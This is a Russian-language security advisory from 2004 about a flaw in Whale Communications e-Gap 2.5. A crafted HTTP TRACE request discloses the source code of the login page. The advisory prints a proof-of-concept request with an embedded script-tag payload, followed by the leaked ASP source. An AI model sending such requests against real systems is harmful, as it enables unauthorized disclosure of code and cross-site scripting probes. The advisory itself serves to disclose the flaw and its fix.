Security Lab

Просмотр исходного кода страницы входа в систему в Whale Communications e-Gap

Дата публикации:18.01.2004
Всего просмотров:1177
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Whale e-Gap 2.5

Описание: Уязвимость обнаружена в Whale Communications e-Gap security appliances. Удаленный пользователь может просмотреть исходных код страницы входа в систему.

Удаленный пользователь может представить специально обработанный HTTP запрос, чтобы просмотреть произвольный код 'Whale Communications Login Page'. Пример:

REQUEST:-
TRACE /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.0
OR TRACE / HTTP/1.0 

PARTIAL RESPONSE:-

<%@ Language=VBScript %>
<!--#include file="WhlCacheCleanFunc.inc"-->
<% Response.Expires = 0 %>

<HTML>
<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE>Whale Communications Login Page</TITLE>


URL производителя: http://www.whalecommunications.com/site/Whale/Corporate/Whale.asp?pi=30

Решение: Установите соответствующее исправление.

Ссылки: ProCheckUp Security Bulletin PR03-07